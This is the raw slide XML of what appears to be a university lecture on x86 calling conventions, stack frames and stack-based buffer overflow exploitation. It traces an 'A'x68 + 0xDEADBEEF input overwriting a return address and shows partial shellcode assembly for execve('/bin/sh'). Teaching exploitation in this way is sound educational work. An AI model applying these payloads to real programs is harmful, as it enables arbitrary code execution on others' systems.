              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load context for new location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include information for “returning”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58A3-03F5-449A-86F1-D6F4B46E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53CD-D784-4F81-AE37-745DCB7F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F67F-8CF9-4C91-8C27-28106994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ways to do this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Calling Conventions”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller Cleanup – caller cleans stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cleanup – called function cleans stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other convention variations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Order that function data is loaded onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whether some data is put into registers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6A55-373C-4816-B56F-B852B843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BE4-74D6-41C9-9A5C-D60426A5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8308-19CB-4F7F-B2B8-1F697ABB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caller v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cleanup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (caller)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DEEFE-6C1F-4A14-9EC8-23860396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8F85-F687-48CC-A387-38EE140D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" y="2590800"/>
            <a:ext cx="4404096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516D7-92AC-47CB-B6A6-B56E1B4D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456651"/>
            <a:ext cx="2358572" cy="36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8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FDEB-5310-49FD-9BE0-C532A6A6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 and ESP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E7F0-6DD7-470F-BB80-811DB592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EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where the stack was when the routine started</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Top of the current stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP is a previous function’s saved ESP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ADF1-1823-4509-84A3-E64C14ED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336393"/>
            <a:ext cx="8153400" cy="218521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/>
              <a:t>You will find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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>at least one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>on each set of slides. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00944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2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72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–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 default for Linux &amp;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954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orange(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a,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b)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char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[16];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c, d;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if(a &gt; b)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c = a;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else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c = b;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d = red(c,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return d;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3050"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6185958" y="1142999"/>
          <a:ext cx="1752600" cy="5600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c, d ≥ 28 bytes if stored on stack)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orange’s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59243" y="2773678"/>
            <a:ext cx="1100454" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1100454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8229600" y="3429000"/>
              <a:ext cx="830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  <a:p>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0"/>
                <a:t>frame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959243" y="4342229"/>
            <a:ext cx="1017511" cy="646331"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1017511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8229600" y="3429000"/>
              <a:ext cx="747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br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" i="1" dirty="0"/>
                <a:t>stack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479809" y="1513840"/>
            <a:ext cx="1692391" cy="722531"/>
            <a:chOff x="4479809" y="1828800"/>
            <a:chExt cx="1692391" cy="722531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Left Brace 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="1828800"/>
              <a:ext cx="304800" cy="722531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9809" y="1866900"/>
              <a:ext cx="1393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parameter</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>area (caller)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51869" y="2246531"/>
            <a:ext cx="1320331" cy="2293817"/>
            <a:chOff x="4851869" y="2590800"/>
            <a:chExt cx="1320331" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Left Brace 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="259080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869" y="3214206"/>
              <a:ext cx="1021095" cy="1328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orange’s</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>initial</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>stack</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>frame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55063" y="4545648"/>
            <a:ext cx="1817137" cy="1093152"/>
            <a:chOff x="4355063" y="2658280"/>
            <a:chExt cx="1817137" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Left Brace 48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063" y="2873479"/>
              <a:ext cx="1517901" cy="21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to be created</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>before</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>calling red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185958" y="4535488"/>
            <a:ext cx="1752600" cy="2206773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42502" y="5638800"/>
            <a:ext cx="1729698" cy="1088265"/>
            <a:chOff x="4442502" y="2658280"/>
            <a:chExt cx="1729698" cy="2575560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Left Brace 24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2502" y="3195253"/>
              <a:ext cx="1430462" cy="15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after red has</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>been called</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Down Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="4988560"/>
            <a:ext cx="472440" cy="1371600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grow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389920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Hijack: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always Computation +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800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     +                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control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49447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="933450" y="2515059"/>
          <a:ext cx="72771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 (aka payload)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267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injection</a:t>
            </a:r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Heap metadata overwrite</a:t>
            </a:r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092700" y="4267200"/>
            <a:ext cx="304800" cy="16002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86400" y="4313237"/>
            <a:ext cx="3352800" cy="132556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Same principle,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different mechanism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1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26328" y="4267200"/>
            <a:ext cx="373934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Assigned Reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Smashing the stack for fun and profit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by Aleph One</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52912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buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occurs when data is written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>outside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the space allocated for the buffer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>C does not check that writes are in-bound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Stack-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>covered in this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Heap-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>more advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>very dependent on system and library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0x080483f7 &lt;+19&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng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79718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rc 47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54354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“123456”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34726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123456\0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06014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25392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… (64 in total)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“A”x68 . “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xDE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61831" y="2221468"/>
            <a:ext cx="1367569" cy="1097464"/>
            <a:chOff x="5261831" y="2221468"/>
            <a:chExt cx="1367569" cy="1097464"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/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corrupted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overwritten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61831" y="2949600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overwritten</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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teardown—1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=&gt;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corrupted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1831" y="2580217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overwritten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5835650" y="3810000"/>
            <a:ext cx="2819400" cy="1322308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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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000" u="sng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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a: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endParaRPr lang="en-US" sz="2000" u="sng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pop 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6183"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="183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8003947" y="2819400"/>
            <a:ext cx="1032104" cy="923330"/>
            <a:chOff x="7959243" y="3138173"/>
            <a:chExt cx="1032104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138173"/>
              <a:ext cx="7617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61831" y="2949600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overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23900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teardown—2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0x080483ff &lt;+27&gt;:	leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty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11115"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1468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003947" y="2743200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corrupted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1831" y="2580217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overwritten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835650" y="3810000"/>
            <a:ext cx="2819400" cy="1322308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leave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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a: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000" u="sng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5835650" y="3180100"/>
            <a:ext cx="2819400" cy="477500"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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4572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mbria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i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5626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teardown—3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0x08048400 &lt;+28&gt;:	ret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5973"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="1101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003947" y="2389812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corrupted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835650" y="3810000"/>
            <a:ext cx="2819400" cy="955000"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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eip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0xDEADBEEF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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(probably crash)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115742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172200" y="2286002"/>
            <a:ext cx="2590800" cy="373379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/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="appst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40" y="2895599"/>
            <a:ext cx="2377760" cy="208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0596" y="4339535"/>
            <a:ext cx="2030604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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>format c: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286002"/>
            <a:ext cx="2590800" cy="3733799"/>
            <a:chOff x="533400" y="2286001"/>
            <a:chExt cx="2590800" cy="3733799"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="533400" y="2286001"/>
              <a:ext cx="2590800" cy="37337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b" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="4800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>White</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20" descr="appstack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40" y="2895600"/>
              <a:ext cx="2377760" cy="2084848"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 22" descr="wifi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40" y="3943642"/>
              <a:ext cx="1047995" cy="100388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9" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046315" y="3616404"/>
            <a:ext cx="1051370" cy="11079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Cambria"/>
              </a:rPr>
              <a:t>vs.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3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2092" y="1143000"/>
            <a:ext cx="4779821" cy="9233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Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>An Epic Battle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="99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9004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143000"/>
            <a:ext cx="6629400" cy="541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…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Traditionally, we inject assembly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exec(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>into buffer.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 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Smashing the stack for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>fun and profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” for exact string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or search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00916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shellcode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5898896" y="2743200"/>
            <a:ext cx="1187704" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5378754"/>
              <a:gd name="adj2" fmla="val 16251393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08209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using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is faster, but this is the traditional explanation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2506" y="1682859"/>
            <a:ext cx="5978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Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> number in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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 up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 2 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 3 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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Call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0x80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>System call runs. Result in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Cambri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860" y="1295400"/>
            <a:ext cx="6086281" cy="8382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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, 0, 0);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324176" y="2438400"/>
            <a:ext cx="1743624" cy="838199"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -110292"/>
              <a:gd name="adj2" fmla="val 1435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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 0xb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162800" y="3581400"/>
            <a:ext cx="1905000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -193178"/>
              <a:gd name="adj2" fmla="val -5687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. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx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0 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx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104E-7 2.7698E-6 L 2.81104E-7 0.135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492875"/>
            <a:ext cx="771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Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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1295400"/>
            <a:ext cx="3276600" cy="4343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/>
              <a:t>xor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/>
              <a:t>ecx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en-US" sz="2800" dirty="0"/>
              <a:t>push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de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f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err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, 0xb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
